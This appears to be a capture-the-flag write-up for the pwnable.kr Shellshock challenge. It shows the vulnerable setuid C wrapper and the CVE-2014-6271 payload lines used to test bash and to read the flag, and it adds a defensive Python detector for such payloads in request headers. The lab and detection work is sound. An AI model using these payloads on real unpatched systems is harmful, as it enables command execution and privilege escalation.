Pwnable.kr - shellshock


Challenge description:

Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure :)

#include <stdio.h>
#include <unistd.h>   /* setresuid, setresgid, getegid */
int main(){
	/* Drop to the real/effective/saved ids of the challenge's group before running bash. */
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	/* The environment of the caller is inherited by this bash invocation. */
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}

The challenge is built around the well-known vulnerability CVE-2014-6271, also known as Shellshock: an unpatched bash parses exported function definitions from environment variables and keeps executing whatever follows the function body. I won’t go into details of how it works (see the references for more info).

We are given a bash binary in our working directory. To test whether it is vulnerable to Shellshock you can run the following command:

shellshock@pwnable:~$ env x='() { :;}; echo TEST' ./bash -c :
TEST

It printed TEST, which means this bash is vulnerable to Shellshock; a patched bash would exit silently without running the trailing command.

The challenge binary is just a setuid wrapper around a call to bash -c, and it passes our environment through untouched, so we can treat it like ./bash above and hand it the command we want executed (/bin/cat flag).
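As an added, defender-side example (not part of the original writeup): a small Python checker that recognises the same `() { ...}` function-export pattern used in the test above inside inbound header or environment values, and extracts whatever trails the function body, which is exactly the part an unpatched bash would have executed. The header names and values are constructed samples.

```python
import re
from typing import Dict, Optional

# An exported bash function starts with "() {" at the beginning of the value.
# Vulnerable bash kept parsing past the closing "}" and ran the remainder.
FUNC_PREFIX = re.compile(r'^\s*\(\)\s*\{')


def shellshock_payload(value: str) -> Optional[str]:
    """Return the command trailing a function body if `value` looks like a
    CVE-2014-6271 probe, or None for benign values (including a plain
    exported function with nothing after its body)."""
    if not FUNC_PREFIX.match(value):
        return None
    depth = 0
    for i in range(value.index('{'), len(value)):
        ch = value[i]
        if ch == '{':
            depth += 1
        elif ch == '}':
            depth -= 1
            if depth == 0:
                # Everything after the body; drop the separating ';'.
                tail = value[i + 1:].strip().lstrip(';').strip()
                return tail or None
    return None  # unterminated body: not the classic pattern


def scan_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Map each header carrying a Shellshock-style payload to that payload."""
    found = {}
    for name, value in headers.items():
        payload = shellshock_payload(value)
        if payload is not None:
            found[name] = payload
    return found


# Constructed sample request headers (not from the page).
SAMPLE_HEADERS = {
    "User-Agent": "() { :;}; echo TEST",   # the probe from the test above
    "Accept": "*/*",
    "Cookie": "() { echo hi; }",           # exported function, no trailing command
}

if __name__ == "__main__":
    print(scan_headers(SAMPLE_HEADERS))
```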

Solution:

shellshock@pwnable:~$ env x='() { :;}; /bin/cat flag' ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!

References:

https://fedoramagazine.org/shellshock-how-does-it-actually-work/